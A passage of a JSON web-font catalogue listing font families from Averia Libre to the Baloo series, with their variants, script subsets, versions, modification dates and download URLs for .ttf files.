\"http://fonts.gstatic.com/s/averialibre/v16/2V0EKIcMGZEnV6xygz7eNjESAKnNRWDh8405.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/averialibre/v16/2V0FKIcMGZEnV6xygz7eNjEavoztb07t-pQgTw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/averialibre/v16/2V0HKIcMGZEnV6xygz7eNjESAJFxakTp2JEwT4Sk.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Averia Sans Libre\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/averiasanslibre/v17/ga6SaxZG_G5OvCf_rt7FH3B6BHLMEd3lMKcQJZP1LmD9.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/averiasanslibre/v17/ga6caxZG_G5OvCf_rt7FH3B6BHLMEdVLKisSL5fXK3D9qtg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/averiasanslibre/v17/ga6XaxZG_G5OvCf_rt7FH3B6BHLMEeVJGIMYDo_8.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/averiasanslibre/v17/ga6RaxZG_G5OvCf_rt7FH3B6BHLMEdVLEoc6C5_8N3k.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/averiasanslibre/v17/ga6SaxZG_G5OvCf_rt7FH3B6BHLMEd31N6cQJZP1LmD9.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/averiasanslibre/v17/ga6caxZG_G5OvCf_rt7FH3B6BHLMEdVLKjsVL5fXK3D9qtg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Averia Serif Libre\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/averiaseriflibre/v16/neIVzD2ms4wxr6GvjeD0X88SHPyX2xYGCSmqwacqdrKvbQ.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/averiaseriflibre/v16/neIbzD2ms4wxr6GvjeD0X88SHPyX2xYOpzMmw60uVLe_bXHq.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/averiaseriflibre/v16/neIWzD2ms4wxr6GvjeD0X88SHPyX2xY-pQGOyYw2fw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/averiaseriflibre/v16/neIUzD2ms4wxr6GvjeD0X88SHPyX2xYOpwuK64kmf6u2.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/averiaseriflibre/v16/neIVzD2ms4wxr6GvjeD0X88SHPyX2xYGGS6qwacqdrKvbQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/averiaseriflibre/v16/neIbzD2ms4wxr6GvjeD0X88SHPyX2xYOpzM2xK0uVLe_bXHq.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Azeret Mono\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfnPRh0raa-5s3AA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfHPVh0raa-5s3AA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfwvVh0raa-5s3AA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfnPVh0raa-5s3AA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfrvVh0raa-5s3AA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfQvJh0raa-5s3AA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfe_Jh0raa-5s3AA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfHPJh0raa-5s3AA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF5ErsiyJsY9O_Gepph-FvtTQgMQUdNekSfNfJh0raa-5s3AA.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLaJkLye2Z4nAN7J.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLYJkbye2Z4nAN7J.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLbXkbye2Z4nAN7J.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLaJkbye2Z4nAN7J.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLa7kbye2Z4nAN7J.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLZXlrye2Z4nAN7J.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLZulrye2Z4nAN7J.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLYJlrye2Z4nAN7J.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/azeretmono/v11/3XF_ErsiyJsY9O_Gepph-HHkf_fUKCzX1EOKVLYglrye2Z4nAN7J.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"B612\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/b612/v12/3JnySDDxiSz32jm4GDigUXw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/b612/v12/3Jn8SDDxiSz36juyHBqlQXwdVw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/b612/v12/3Jn9SDDxiSz34oWXPDCLTXUETuE.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/b612/v12/3Jn_SDDxiSz36juKoDWBSVcBXuFb0Q.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"B612 Mono\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/b612mono/v12/kmK_Zq85QVWbN1eW6lJl1wTcquRTtg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/b612mono/v12/kmK5Zq85QVWbN1eW6lJV1Q7YiOFDtqtf.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/b612mono/v12/kmK6Zq85QVWbN1eW6lJdayv4os9Pv7JGSg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/b612mono/v12/kmKkZq85QVWbN1eW6lJV1TZkp8VLnbdWSg4x.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"BIZ UDGothic\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"greek-ext\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bizudgothic/v8/daafSTouBF7RUjnbt8p3LuKttQN98z_MbQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bizudgothic/v8/daaASTouBF7RUjnbt8p3LuKVCSxZ-xTQZMhbaA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"BIZ UDMincho\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"greek-ext\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2023-01-18\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bizudmincho/v9/EJRRQgI6eOxFjBdKs38yhtW1dwT7rcpY8Q.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bizudmincho/v9/EJROQgI6eOxFjBdKs38yhtWNyyvfpeFE-IyCrw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"BIZ UDPGothic\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"greek-ext\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bizudpgothic/v8/hES36X5pHAIBjmS84VL0Bue83nUMQWkMUAk.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bizudpgothic/v8/hESq6X5pHAIBjmS84VL0Bue85skjZWEnTABCSQo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"BIZ UDPMincho\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"greek-ext\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2023-01-18\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bizudpmincho/v9/ypvfbXOBrmYppy7oWWTg1_58nhhYtUb0gZk.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bizudpmincho/v9/ypvCbXOBrmYppy7oWWTg1_58pqR3kU7fnZAy57k.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Babylonica\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/babylonica/v2/5aUw9_i2qxWVCAE2aHjTqDJ0-VVMoEw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bad Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-04-20\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/badscript/v16/6NUT8F6PJgbFWQn47_x7lOwuzd1AZtw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bahiana\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bahiana/v19/uU9PCBUV4YenPWJU7xPb3vyHmlI.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bahianita\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bahianita/v17/yYLr0hTb3vuqqsBUgxWtxTvV2NJPcA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bai Jamjuree\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/baijamjuree/v11/LDIqapSCOBt_aeQQ7ftydoa0kePuk5A1-yiSgA.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/baijamjuree/v11/LDIoapSCOBt_aeQQ7ftydoa8W_oGkpox2S2CgOva.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/baijamjuree/v11/LDIqapSCOBt_aeQQ7ftydoa09eDuk5A1-yiSgA.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/baijamjuree/v11/LDIoapSCOBt_aeQQ7ftydoa8W_pikZox2S2CgOva.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/baijamjuree/v11/LDI1apSCOBt_aeQQ7ftydoaMWcjKm7sp8g.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/baijamjuree/v11/LDIrapSCOBt_aeQQ7ftydoa8W8LOub458jGL.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/baijamjuree/v11/LDIqapSCOBt_aeQQ7ftydoa0reHuk5A1-yiSgA.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/baijamjuree/v11/LDIoapSCOBt_aeQQ7ftydoa8W_o6kJox2S2CgOva.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/baijamjuree/v11/LDIqapSCOBt_aeQQ7ftydoa0gebuk5A1-yiSgA.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/baijamjuree/v11/LDIoapSCOBt_aeQQ7ftydoa8W_oWl5ox2S2CgOva.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/baijamjuree/v11/LDIqapSCOBt_aeQQ7ftydoa05efuk5A1-yiSgA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/baijamjuree/v11/LDIoapSCOBt_aeQQ7ftydoa8W_pylpox2S2CgOva.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bakbak One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bakbakone/v6/zOL54pXAl6RI-p_ardnuycRuv-hHkOs.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ballet\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ballet/v21/QGYyz_MYZA-HM4NjuGOVnUEXme1I4Xi3C4G-EiAou6Y.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Baloo 2\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/baloo2/v16/wXK0E3kTposypRydzVT08TS3JnAmtdgazapv9Fat7WcN.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/baloo2/v16/wXK0E3kTposypRydzVT08TS3JnAmtdgozapv9Fat7WcN.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/baloo2/v16/wXK0E3kTposypRydzVT08TS3JnAmtdjEyqpv9Fat7WcN.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/baloo2/v16/wXK0E3kTposypRydzVT08TS3JnAmtdj9yqpv9Fat7WcN.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/baloo2/v16/wXK0E3kTposypRydzVT08TS3JnAmtdiayqpv9Fat7WcN.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Baloo Bhai 2\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"gujarati\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/baloobhai2/v21/sZlWdRSL-z1VEWZ4YNA7Y5ItevYWUOHDE8FvNighMXeCo-jsZzo.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/baloobhai2/v21/sZlWdRSL-z1VEWZ4YNA7Y5ItevYWUOHDE8FvNhohMXeCo-jsZzo.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/baloobhai2/v21/sZlWdRSL-z1VEWZ4YNA7Y5ItevYWUOHDE8FvNvYmMXeCo-jsZzo.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/baloobhai2/v21/sZlWdRSL-z1VEWZ4YNA7Y5ItevYWUOHDE8FvNs8mMXeCo-jsZzo.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/baloobhai2/v21/sZlWdRSL-z1VEWZ4YNA7Y5ItevYWUOHDE8FvNqgmMXeCo-jsZzo.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Baloo Bhaijaan 2\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/baloobhaijaan2/v14/zYXwKUwuEqdVGqM8tPDdAA_Y-_bMKo1EhQd2tWxo8TyRSqP4L4ppfcyC.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/baloobhaijaan2/v14/zYXwKUwuEqdVGqM8tPDdAA_Y-_bMKo1EhQd2tWxo8TyjSqP4L4ppfcyC.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/baloobhaijaan2/v14/zYXwKUwuEqdVGqM8tPDdAA_Y-_bMKo1EhQd2tWxo8TxPTaP4L4ppfcyC.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/baloobhaijaan2/v14/zYXwKUwuEqdVGqM8tPDdAA_Y-_bMKo1EhQd2tWxo8Tx2TaP4L4ppfcyC.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/baloobhaijaan2/v14/zYXwKUwuEqdVGqM8tPDdAA_Y-_bMKo1EhQd2tWxo8TwRTaP4L4ppfcyC.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Baloo Bhaina 2\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"oriya\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/baloobhaina2/v22/qWc-B6yyq4P9Adr3RtoX1q6ySgbwusXwJjkOS-XEssPvRfRLYWmZSA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/baloobhaina2/v22/qWc-B6yyq4P9Adr3RtoX1q6ySgbwusXwJjkOS-XEgMPvRfRLYWmZSA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/baloobhaina2/v22/qWc-B6yyq4P9Adr3RtoX1q6ySgbwusXwJjkOS-XEbMTvRfRLYWmZSA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/baloobhaina2/v22/qWc-B6yyq4P9Adr3RtoX1q6ySgbwusXwJjkOS-XEVcTvRfRLYWmZSA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/baloobhaina2/v22/qWc-B6yyq4P9Adr3RtoX1q6ySgbwusXwJjkOS-XEMsTvRfRLYWmZSA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Baloo Chettan 2\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"malayalam\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/baloochettan2/v16/vm8hdRbmXEva26PK-NtuX4ynWEzF69-L4gqgkIL5CeKTO1oeH9xI2gc.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/baloochettan2/v16/vm8hdRbmXEva26PK-NtuX4ynWEzF69-L4gqgkIL5CdCTO1oeH9xI2gc.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/baloochettan2/v16/vm8hdRbmXEva26PK-NtuX4ynWEzF69-L4gqgkIL5CTyUO1oeH9xI2gc.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/baloochettan2/v16/vm8hdRbmXEva26PK-NtuX4ynWEzF69-L4gqgkIL5CQWUO1oeH9xI2gc.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/baloochettan2/v16/vm8hdRbmXEva26PK-NtuX4ynWEzF69-L4gqgkIL5CWKUO1oeH9xI2gc.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Baloo Da 2\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"bengali\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/balooda2/v16/2-c39J9j0IaUMQZwAJyJaOX1UUnf3GLnYjALsTNe55aRa7UE.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/balooda2/v16/2-c39J9j0IaUMQZwAJyJaOX1UUnf3GLnYjA5sTNe55aRa7UE.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/balooda2/v16/2-c39J9j0IaUMQZwAJyJaOX1UUnf3GLnYjDVtjNe55aRa7UE.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/balooda2/v16/2-c39J9j0IaUMQZwAJyJaOX1UUnf3GLnYjDstjNe55aRa7UE.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/balooda2/v16/2-c39J9j0IaUMQZwAJyJaOX1UUnf3GLnYjCLtjNe55aRa7UE.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Baloo Paaji 2\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"gurmukhi\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/baloopaaji2/v22/i7dfIFFzbz-QHZUdV9_UGWZuelmy79QJ1HOSY9AX74fybRUz1r5t.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/baloopaaji2/v22/i7dfIFFzbz-QHZUdV9_UGWZuelmy79QJ1HOSY9Al74fybRUz1r5t.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/baloopaaji2/v22/i7dfIFFzbz-QHZUdV9_UGWZuelmy79QJ1HOSY9DJ6IfybRUz1r5t.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/baloopaaji2/v22/i7dfIFFzbz-QHZUdV9_UGWZuelmy79QJ1HOSY9Dw6IfybRUz1r5t.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/baloopaaji2/v22/i7dfIFFzbz-QHZUdV9_UGWZuelmy79QJ1HOSY9CX6IfybRUz1r5t.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Baloo Tamma 2\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"kannada\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/balootamma2/v15/vEFE2_hCAgcR46PaajtrYlBbVUMUJgIC5LHTrMscPp-0IF71SGC5.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/balootamma2/v15/vEFE2_hCAgcR46PaajtrYlBbVUMUJgIC5LHTrMsuPp-0IF71SGC5.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/balootamma2/v15/vEFE2_hCAgcR46PaajtrYlBbVUMUJgIC5LHTrMvCOZ-0IF71SGC5.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/balootamma2/v15/vEFE2_hCAgcR46PaajtrYlBbVUMUJgIC5LHTrMv7OZ-0IF71SGC5.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/balootamma2/v15/vEFE2_hCAgcR46PaajtrYlBbVUMUJgIC5LHTrMucOZ-0IF71SGC5.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Baloo Tammudu 2\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"telugu\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/balootammudu2/v22/1Pt5g8TIS_SAmkLguUdFP8UaJcKkzlPmMT00GaE_Jf8e4c6PZSlGmAA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/balootammudu2/v22/1Pt5g8TIS_SAmkLguUdFP8UaJcKkzlPmMT00GaE_Jc0e4c6PZSlGmAA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/balootammudu2/v22/1Pt5g8TIS_SAmkLguUdFP8UaJcKkzlPmMT00GaE_JSEZ4c6PZSlGmAA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/balootammudu2/v22/1Pt5g8TIS_SAmkLguUdFP8UaJcKkzlPmMT00GaE_JRgZ4c6PZSlGmAA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/balootammudu2/v22/1Pt5g8TIS_SAmkLguUdFP8UaJcKkzlPmMT00GaE_JX8Z4c6PZSlGmAA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Baloo Thambi 2\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      